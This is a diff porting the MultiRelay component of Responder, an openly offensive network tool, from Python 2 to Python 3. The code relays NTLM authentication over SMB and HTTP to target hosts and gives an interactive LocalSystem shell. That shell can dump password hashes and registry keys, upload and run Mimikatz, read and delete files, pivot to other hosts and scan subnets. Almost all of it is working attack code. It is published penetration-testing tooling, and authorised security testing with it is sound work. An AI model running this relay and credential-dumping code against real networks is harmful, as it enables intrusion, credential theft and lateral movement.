- print "[+] Running command: %s"%(OneCommand)
- RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
+ print("[+] Running command: %s"%(OneCommand))
+ RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump:
- print "[+] Dumping hashes"
- DumpHashes(data, s, Target[0])
+ print("[+] Dumping hashes")
+ DumpHashes(data, s, Target[0])
os._exit(1)
## Drop into the shell.
- if data[8:10] == "\x75\x00" and OneCommand == None:
+ if data[8:10] == b'\x75\x00' and OneCommand == None:
if Pivoting[0] == "1":
- pass
+ pass
else:
- print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
- ShowHelp()
+ print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
+ ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
- print color('Connected to %s as LocalSystem.'%(Target[0]),2,1)
+ print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
while True:
## We either just arrived here or we're back from a command operation, let's setup some stuff.
- if data[8:10] == "\x75\x00":
- #start a thread for raw_input, so we can do other stuff while we wait for a command.
+ if data[8:10] == b'\x75\x00':
+ #start a thread for raw_input, so we can do other stuff while we wait for a command.
t = Thread(target=get_command, args=())
t.daemon = True
t.start()
@@ -596,10 +624,10 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
count = count+1
SMBKeepAlive(s, data)
if count == DoEvery:
- DumbSMBChain(data, s, Target[0])
- count = 0
+ DumbSMBChain(data, s, Target[0])
+ count = 0
if any(x in Cmd for x in Cmd) is True:
- break
+ break
##Grab the commands. Cmd is global in get_command().
DumpReg = re.findall('^dump', Cmd[0])
@@ -617,202 +645,203 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit":
- print "[+] Returning in relay mode."
- del Cmd[:]
- del ShellOpen[:]
- return None
+ print("[+] Returning in relay mode.")
+ del Cmd[:]
+ del ShellOpen[:]
+ return None
##For all of the following commands we send the data (var: data) returned by the
##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
##We also clean up the command array when done.
if DumpReg:
- data = DumpHashes(data, s, Target[0])
- del Cmd[:]
+ data = DumpHashes(data, s, Target[0])
+ del Cmd[:]
if Read:
- File = Read[0]
- data = ReadFile(data, s, File, Target[0])
- del Cmd[:]
+ File = Read[0]
+ data = ReadFile(data, s, File, Target[0])
+ del Cmd[:]
if Get:
- File = Get[0]
- data = GetAfFile(data, s, File, Target[0])
- del Cmd[:]
+ File = Get[0]
+ data = GetAfFile(data, s, File, Target[0])
+ del Cmd[:]
if Upload:
- File = Upload[0]
- if os.path.isfile(File):
- FileSize, FileContent = UploadContent(File)
- File = os.path.basename(File)
- data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
- del Cmd[:]
- else:
- print File+" does not exist, please specify a valid file."
- del Cmd[:]
+ File = Upload[0]
+ if os.path.isfile(File):
+ FileSize, FileContent = UploadContent(File)
+ File = os.path.basename(File)
+ data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
+ del Cmd[:]
+ else:
+ print(File+" does not exist, please specify a valid file.")
+ del Cmd[:]
if Delete:
- Filename = Delete[0]
- data = DeleteFile(data, s, Filename, Target[0])
- del Cmd[:]
+ Filename = Delete[0]
+ data = DeleteFile(data, s, Filename, Target[0])
+ del Cmd[:]
if RegDump:
- Key = RegDump[0]
- data = SaveAKey(data, s, Target[0], Key)
- del Cmd[:]
+ Key = RegDump[0]
+ data = SaveAKey(data, s, Target[0], Key)
+ del Cmd[:]
if RunAs:
- if os.path.isfile(RunAsFileName):
- FileSize, FileContent = UploadContent(RunAsFileName)
- FileName = os.path.basename(RunAsFileName)
- data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
- Exec = RunAs[0]
- data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
- del Cmd[:]
- else:
- print RunAsFileName+" does not exist, please specify a valid file."
- del Cmd[:]
+ if os.path.isfile(RunAsFileName):
+ FileSize, FileContent = UploadContent(RunAsFileName)
+ FileName = os.path.basename(RunAsFileName)
+ data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
+ Exec = RunAs[0]
+ data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
+ del Cmd[:]
+ else:
+ print(RunAsFileName+" does not exist, please specify a valid file.")
+ del Cmd[:]
if LCmd:
- subprocess.call(LCmd[0], shell=True)
- del Cmd[:]
+ subprocess.call(LCmd[0], shell=True)
+ del Cmd[:]
if Mimi:
- if os.path.isfile(MimikatzFilename):
- FileSize, FileContent = UploadContent(MimikatzFilename)
- FileName = os.path.basename(MimikatzFilename)
- data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
- Exec = Mimi[0]
- data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
- del Cmd[:]
- else:
- print MimikatzFilename+" does not exist, please specify a valid file."
- del Cmd[:]
+ if os.path.isfile(MimikatzFilename):
+ FileSize, FileContent = UploadContent(MimikatzFilename)
+ FileName = os.path.basename(MimikatzFilename)
+ data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
+ Exec = Mimi[0]
+ data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
+ del Cmd[:]
+ else:
+ print(MimikatzFilename+" does not exist, please specify a valid file.")
+ del Cmd[:]
if Mimi32:
- if os.path.isfile(Mimikatzx86Filename):
- FileSize, FileContent = UploadContent(Mimikatzx86Filename)
- FileName = os.path.basename(Mimikatzx86Filename)
- data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
- Exec = Mimi32[0]
- data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
- del Cmd[:]
- else:
- print Mimikatzx86Filename+" does not exist, please specify a valid file."
- del Cmd[:]
+ if os.path.isfile(Mimikatzx86Filename):
+ FileSize, FileContent = UploadContent(Mimikatzx86Filename)
+ FileName = os.path.basename(Mimikatzx86Filename)
+ data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
+ Exec = Mimi32[0]
+ data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
+ del Cmd[:]
+ else:
+ print(Mimikatzx86Filename+" does not exist, please specify a valid file.")
+ del Cmd[:]
if Pivot:
- if Pivot[0] == Target[0]:
- print "[Pivot Verification Failed]: You're already on this host. No need to pivot."
- del Pivot[:]
- del Cmd[:]
- else:
- if ShowSigning(Pivot[0]):
- del Pivot[:]
- del Cmd[:]
- else:
- if os.path.isfile(RunAsFileName):
- FileSize, FileContent = UploadContent(RunAsFileName)
- FileName = os.path.basename(RunAsFileName)
- data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
- RunAsPath = '%windir%\\Temp\\'+FileName
- Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
-
- if Status == True:
- print "[+] Pivoting to %s."%(Pivot[0])
- if os.path.isfile(RunAsFileName):
- FileSize, FileContent = UploadContent(RunAsFileName)
- data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
- #shell will close.
- del ShellOpen[:]
- #update the new host.
- Host = [Pivot[0]]
- #we're in pivoting mode.
- Pivoting = ["1"]
- data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
- del Cmd[:]
- s.close()
- return None
-
- if Status == False:
- print "[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host."
- del Cmd[:]
- del Pivot[:]
- else:
- print RunAsFileName+" does not exist, please specify a valid file."
+ if Pivot[0] == Target[0]:
+ print("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
+ del Pivot[:]
+ del Cmd[:]
+ else:
+ if ShowSigning(Pivot[0]):
+ del Pivot[:]
del Cmd[:]
+ else:
+ if os.path.isfile(RunAsFileName):
+ FileSize, FileContent = UploadContent(RunAsFileName)
+ FileName = os.path.basename(RunAsFileName)
+ data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
+ RunAsPath = '%windir%\\Temp\\'+FileName
+ Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
+
+ if Status == True:
+ print("[+] Pivoting to %s."%(Pivot[0]))
+ if os.path.isfile(RunAsFileName):
+ FileSize, FileContent = UploadContent(RunAsFileName)
+ data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
+ #shell will close.
+ del ShellOpen[:]
+ #update the new host.
+ Host = [Pivot[0]]
+ #we're in pivoting mode.
+ Pivoting = ["1"]
+ data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
+ del Cmd[:]
+ s.close()
+ return None
+
+ if Status == False:
+ print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
+ del Cmd[:]
+ del Pivot[:]
+ else:
+ print(RunAsFileName+" does not exist, please specify a valid file.")
+ del Cmd[:]
if Scan:
- LocalIp = FindLocalIp()
- Range = ConvertToClassC(Target[0], Scan[0])
- RunPivotScan(Range, Target[0])
- del Cmd[:]
+ LocalIp = FindLocalIp()
+ Range = ConvertToClassC(Target[0], Scan[0])
+ RunPivotScan(Range, Target[0])
+ del Cmd[:]
if Help:
- ShowHelp()
- del Cmd[:]
+ ShowHelp()
+ del Cmd[:]
##Let go with the command.
if any(x in Cmd for x in Cmd):
if len(Cmd[0]) > 1:
- if os.path.isfile(SysSVCFileName):
- FileSize, FileContent = UploadContent(SysSVCFileName)
- FileName = os.path.basename(SysSVCFileName)
- RunPath = '%windir%\\Temp\\'+FileName
- data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
- data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
- del Cmd[:]
- else:
- print SysSVCFileName+" does not exist, please specify a valid file."
- del Cmd[:]
-
+ if os.path.isfile(SysSVCFileName):
+ FileSize, FileContent = UploadContent(SysSVCFileName)
+ FileName = os.path.basename(SysSVCFileName)
+ RunPath = '%windir%\\Temp\\'+FileName
+ data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
+ data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
+ del Cmd[:]
+ else:
+ print(SysSVCFileName+" does not exist, please specify a valid file.")
+ del Cmd[:]
+ if isinstance(data, str):
+ data = data.encode('latin-1')
if data is None:
- print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n"
+ print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
- if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
- head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
+ head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
class ThreadingTCPServer(TCPServer):
- def server_bind(self):
- TCPServer.server_bind(self)
+ def server_bind(self):
+ TCPServer.server_bind(self)
ThreadingTCPServer.allow_reuse_address = 1
ThreadingTCPServer.daemon_threads = True
def serve_thread_tcp(host, port, handler):
- try:
- server = ThreadingTCPServer((host, port), handler)
- server.serve_forever()
- except:
- print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)
+ try:
+ server = ThreadingTCPServer((host, port), handler)
+ server.serve_forever()
+ except:
+ print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
def main():
- try:
- threads = []
- threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
- threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
- threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
- if ExtraPort != 0:
- threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
- for thread in threads:
- thread.setDaemon(True)
- thread.start()
+ try:
+ threads = []
+ threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
+ threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
+ threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
+ if ExtraPort != 0:
+ threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
+ for thread in threads:
+ thread.setDaemon(True)
+ thread.start()
- while True:
- time.sleep(1)
+ while True:
+ time.sleep(1)
- except (KeyboardInterrupt, SystemExit):
- ##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
- ##This is a bug in python readline when dealing with raw_input()..
- if ShellOpen:
- os.system('stty sane')
- ##Then exit
- sys.exit("\rExiting...")
+ except (KeyboardInterrupt, SystemExit):
+ ##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
+ ##This is a bug in python readline when dealing with raw_input()..
+ if ShellOpen:
+ os.system('stty sane')
+ ##Then exit
+ sys.exit("\rExiting...")
if __name__ == '__main__':
- main()
+ main()
diff --git a/tools/MultiRelay/RelayMultiCore.py b/tools/MultiRelay/RelayMultiCore.py
index ee2fa86..31d0dfc 100644
--- a/tools/MultiRelay/RelayMultiCore.py
+++ b/tools/MultiRelay/RelayMultiCore.py
@@ -1,5 +1,6 @@
#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools
+# -*- coding: latin-1 -*-
+# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
@@ -14,8 +15,12 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import struct
import sys
+if (sys.version_info > (3, 0)):
+ PY2OR3 = "PY3"
+else:
+ PY2OR3 = "PY2"
+import struct
import random
import time
import os
@@ -24,11 +29,15 @@ import re
import datetime
import threading
import uuid
-from RelayMultiPackets import *
+import codecs
+import sys
+from .RelayMultiPackets import *
from odict import OrderedDict
from base64 import b64decode, b64encode
-sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump')))
-from framework.win32.hashdump import dump_file_hashes
+
+sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'impacket-dev/')))
+from secretsdump import DumpSecrets
+
from SMBFinger.Finger import ShowSmallResults
from socket import *
@@ -47,35 +56,55 @@ class Packet():
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
- for k,v in kw.items():
+ for k,v in list(kw.items()):
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
- return "".join(map(str, self.fields.values()))
+ return "".join(map(str, list(self.fields.values())))
+
+def StructWithLenPython2or3(endian,data):
+ #Python2...
+ if PY2OR3 is "PY2":
+ return struct.pack(endian, data)
+ #Python3...
+ else:
+ return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+ if PY2OR3 is "PY2":
+ return str(data)
+ else:
+ return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+ if PY2OR3 is "PY2":
+ return str(data)
+ else:
+ return str(data.decode('latin-1'))
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
- if not os.path.isfile(outfile):
- with open(outfile,"w") as outf:
- outf.write(data + '\n')
- return
- with open(outfile,"r") as filestr:
- if re.search(user.encode('hex'), filestr.read().encode('hex')):
- return False
- elif re.search(re.escape("$"), user):
- return False
- with open(outfile,"a") as outf2:
- outf2.write(data + '\n')
+ if not os.path.isfile(outfile):
+ with open(outfile,"w") as outf:
+ outf.write(data + '\n')
+ return
+ with open(outfile,"rb") as filestr:
+ if re.search(NetworkSendBufferPython2or3(user), filestr.read()):
+ return False
+ elif re.search(re.escape(b'$'), NetworkSendBufferPython2or3(user)):
+ return False
+ with open(outfile,"a") as outf2:
+ outf2.write(data + '\n')
#Function used to verify if a previous auth attempt was made.
def ReadData(Outfile, Client, User, Domain, Target, cmd):
try:
- with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
- Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
- if re.search(Login.encode('hex'), filestr.read().encode('hex')):
- print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)
+ with open(Logs_Path+"logs/"+Outfile,"rb") as filestr:
+ Login = Client+':'+User+':'+Domain+':'+Target+':Logon Failure'
+ if re.search(codecs.encode(NetworkSendBufferPython2or3(Login),'hex'), codecs.encode(filestr.read(),'hex')):
+ print("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User))
return True
else:
@@ -84,178 +113,178 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
raise
def ServeOPTIONS(data):
- WebDav= re.search('OPTIONS', data)
- if WebDav:
- Buffer = WEBDAV_Options_Answer()
- return str(Buffer)
+ WebDav= re.search(b'OPTIONS', data)
+ if WebDav:
+ Buffer = WEBDAV_Options_Answer()
+ return str(Buffer)
- return False
+ return False
def IsSMBAnonymous(data):
- SSPIStart = data.find('NTLMSSP')
+ SSPIStart = data.find(b'NTLMSSP')
SSPIString = data[SSPIStart:]
Username = struct.unpack(' 24:
- DomainLen = struct.unpack(' 24:
+ DomainLen = struct.unpack(' 60:
- SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
- DomainLen = struct.unpack(' 60:
+ SMBHash = codecs.encode(SSPIString[NthashOffset:NthashOffset+NthashLen],'hex').decode('latin-1').upper()
+ DomainLen = struct.unpack('= 258:
- Challenge = data[106:114]
+ Challenge = data[106:114]
if Pivoting[0] == "1":
- return Challenge
+ return Challenge
else:
- print "[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex")
- return Challenge
+ print("[+] Setting up HTTP relay with SMB challenge:", codecs.encode(Challenge,'hex').decode('latin-1'))
+ return Challenge
#Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target.
def ExtractRawNTLMPacket(data):
SecBlobLen = struct.unpack("i", len(''.join(payload)))
+ length = StructWithLenPython2or3(">i", len(''.join(payload)))
return length
def ConvertToClassC(Host, Class):
Class = Class.strip()
Ip = re.split(r'(\.|/)', Host)
if Class == "/24":
- Ip[6:7] = ["0"]
- return ''.join(Ip)+Class
+ Ip[6:7] = ["0"]
+ return ''.join(Ip)+Class
if Class == "/16":
- Ip[4:5] = ["0"]
- Ip[6:7] = ["0"]
- return ''.join(Ip)+Class
+ Ip[4:5] = ["0"]
+ Ip[6:7] = ["0"]
+ return ''.join(Ip)+Class
else:
- print "Illegal class, please use: /24 or /16"
- return None
+ print("Illegal class, please use: /24 or /16")
+ return None
def GenerateRandomFileName():
return ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(random.randint(5, 15))])
@@ -381,47 +411,47 @@ def GenerateNamedPipeName():
def Generateuuid():
RandomStr = binascii.b2a_hex(os.urandom(16))
- x = uuid.UUID(bytes_le=RandomStr.decode('hex'))
- DisplayGUID = uuid.UUID(RandomStr)
+ x = uuid.UUID(bytes_le=codecs.decode(RandomStr,'hex'))
+ DisplayGUID = uuid.UUID(RandomStr.decode('latin-1'))
DisplayGUIDle = x.bytes
- return str(DisplayGUID), str(DisplayGUIDle)
+ return str(DisplayGUID), str(DisplayGUIDle.decode('latin-1'))
###
#SMBRelay grab
###
def GrabNegotiateFromTarget(data, s, Pivoting):
- ## Start with nego protocol + session setup negotiate to our target.
- h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8")
- n = SMBNegoCairo(Data = SMBNegoCairoData())
- n.calculate()
- packet0 = str(h)+str(n)
- buffer0 = longueur(packet0)+packet0
- s.send(buffer0)
- smbdata = s.recv(4096)
- ##Session Setup AndX Request, NTLMSSP_NEGOTIATE to our target.
- if smbdata[8:10] == "\x72\x00":
- head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
- t = data[36:] #simply grab the whole packet except the smb header from the client.
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- smbdata = s.recv(4096)
- challenge = ExtractSMBChallenge(smbdata, Pivoting)#Grab the challenge, in case we want to crack the hash later.
- return data, smbdata, s, challenge
+ ## Start with nego protocol + session setup negotiate to our target.
+ h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8")
+ n = SMBNegoCairo(Data = SMBNegoCairoData())
+ n.calculate()
+ packet0 = str(h)+str(n)
+ buffer0 = longueur(packet0)+packet0
+ s.send(NetworkSendBufferPython2or3(buffer0))
+ smbdata = s.recv(4096)
+ ##Session Setup AndX Request, NTLMSSP_NEGOTIATE to our target.
+ if smbdata[8:10] == b'\x72\x00':
+ head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
+ t = data[36:].decode('latin-1') #simply grab the whole packet except the smb header from the client.
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ smbdata = s.recv(4096)
+ challenge = ExtractSMBChallenge(smbdata, Pivoting)#Grab the challenge, in case we want to crack the hash later.
+ return data, smbdata, s, challenge
def SendChallengeToClient(data, smbdata, conn):
- ##Relay all that to our client.
- if data[8:10] == "\x73\x00":
- head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
- t = smbdata[36:]#simply grab the whole packet except the smb header from the client.
- packet0 = str(head)+str(t)
- buffer0 = longueur(packet0)+packet0
- conn.send(buffer0)
- data = conn.recv(4096)
- return data, conn
+ ##Relay all that to our client.
+ if data[8:10] == b'\x73\x00':
+ head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+ t = smbdata[36:]#simply grab the whole packet except the smb header from the client.
+ packet0 = str(head)+str(t)
+ buffer0 = longueur(packet0)+packet0
+ conn.send(NetworkSendBufferPython2or3(buffer0))
+ data = conn.recv(4096)
+ return data, conn
-##This function is one of the main SMB read function. We request all the time 65520 bytes to the server.
+##This function is one of the main SMB read function. We request all the time 65520 bytes to the server.
#Add (+32 (SMBHeader) +4 Netbios Session Header + 27 for the ReadAndx structure) +63 and you end up with 65583.
#set the socket to non-blocking then grab all data, if our target has less than 65520 (last packet) grab the incoming
#data until we reach our custom timeout. Set back the socket to blocking and return the data.
@@ -438,7 +468,7 @@ def SMBReadRecv(s):
try:
data = s.recv(65583)
if data:
- Completedata.append(data)
+ Completedata.append(data.decode('latin-1'))
Start=time.time()
else:
break
@@ -448,51 +478,59 @@ def SMBReadRecv(s):
s.setblocking(1)
return s, ''.join(Completedata)
-##We send our ReadAndX request with our offset and call SMBReadRecv
+##We send our ReadAndX request with our offset and call SMBReadRecv
def ReadOutput(DataOffset, f, data, s):
- head = SMBHeader(cmd="\x2e",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
- t = ReadRequestAndX(FID=f, Offset = DataOffset)
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- s, data = SMBReadRecv(s)
- return data, s, ExtractCommandOutput(data)
+ if isinstance(data, str):
+ data = data.encode('latin-1')
+ head = SMBHeader(cmd="\x2e",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00")
+ t = ReadRequestAndX(FID=f.decode('latin-1'), Offset = DataOffset)
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ s, data = SMBReadRecv(s)
+ return data, s, ExtractCommandOutput(data)
-##We send our WriteAndX request with our offset.
+##We send our WriteAndX request with our offset.
def WriteOutput(DataOffset, Chunk, data, f, s):
- head = SMBHeader(cmd="\x2f", flag1="\x18", flag2="\x07\xc8", uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
- t = SMBWriteData(FID=f, Offset = DataOffset, Data= Chunk)
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- data = s.recv(2048)
- ##LockingAndX //should not happens since we didn't request an oplock, but just in case..
- if data[8:10] == "\x24\x00":
- head = SMBHeader(cmd="\x24", flag1="\x88", flag2="\x07\xc8", uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
+ head = SMBHeader(cmd="\x2f", flag1="\x18", flag2="\x07\xc8", uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00")
+ t = SMBWriteData(FID=f.decode('latin-1'), Offset = DataOffset, Data= Chunk)
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
+ ##LockingAndX //should not happens since we didn't request an oplock, but just in case..
+ if data[8:10] == b"\x24\x00":
+ head = SMBHeader(cmd="\x24", flag1="\x88", flag2="\x07\xc8", uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00")
t = SMBLockingAndXResponse()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- return data, s
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ return data, s
-##When used this function will inject an OpenAndX file not found SMB Header into an incoming packet.
+##When used this function will inject an OpenAndX file not found SMB Header into an incoming packet.
##This is usefull for us when an operation fail. We land back to our shell send right away a
##Tree Connect IPC$ and start to send SMB echos so we don't loose this precious connection.
def ModifySMBRetCode(data):
- modified = list(data)
- modified[8:10] = "\x2d\x34"
- return ''.join(modified)
+ if isinstance(data, str):
+ modified = list(data)
+ modified[8:10] = str("\x2d\x34")
+ return ''.join(modified)
+ else:
+ data = data.decode('latin-1')
+ modified = list(data)
+ modified[8:10] = str("\x2d\x34")
+ return ''.join(modified)
##We send our ReadAndX request with our offset and call recv()
def SMBDCERPCReadOutput(DataOffset, length,f, data, s):
- head = SMBHeader(cmd="\x2e",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
- t = SMBDCERPCReadRequestAndX(FID=f, MaxCountLow=length, MinCount=length,Offset = DataOffset)
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- data = s.recv(8092)
- return data, s, ExtractRPCCommandOutput(data)
+ head = SMBHeader(cmd="\x2e",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00")
+ t = SMBDCERPCReadRequestAndX(FID=f.decode('latin-1'), MaxCountLow=length, MinCount=length,Offset = DataOffset)
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(8092)
+ return data, s, ExtractRPCCommandOutput(data)
###
#BindCall
@@ -500,330 +538,332 @@ def SMBDCERPCReadOutput(DataOffset, length,f, data, s):
def BindCall(UID, Version, File, data, s):
Data = data
- head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBNTCreateDataSVCCTL(FileName=File)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
+ if isinstance(data, str):
+ data.encode('latin-1')
## Fail Handling.
- if data[8:10] == "\xa2\x22":
- print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n"
+ if data[8:10] == b"\xa2\x22":
+ print("[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n")
return ModifySMBRetCode(data)
## Fail Handling.
- if data[8:10]== "\xa2\xac":##Pipe is sleeping.
+ if data[8:10]== b"\xa2\xac":##Pipe is sleeping.
f = "PipeNotAvailable"
return Data, s, f
## Fail Handling.
- if data[8:10]== "\xa2\x34":##Pipe is not enabled.
+ if data[8:10]== b"\xa2\x34":##Pipe is not enabled.
f = "ServiceNotFound"
return Data, s, f
## DCE/RPC Write.
- if data[8:10] == "\xa2\x00":
- head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\xa2\x00":
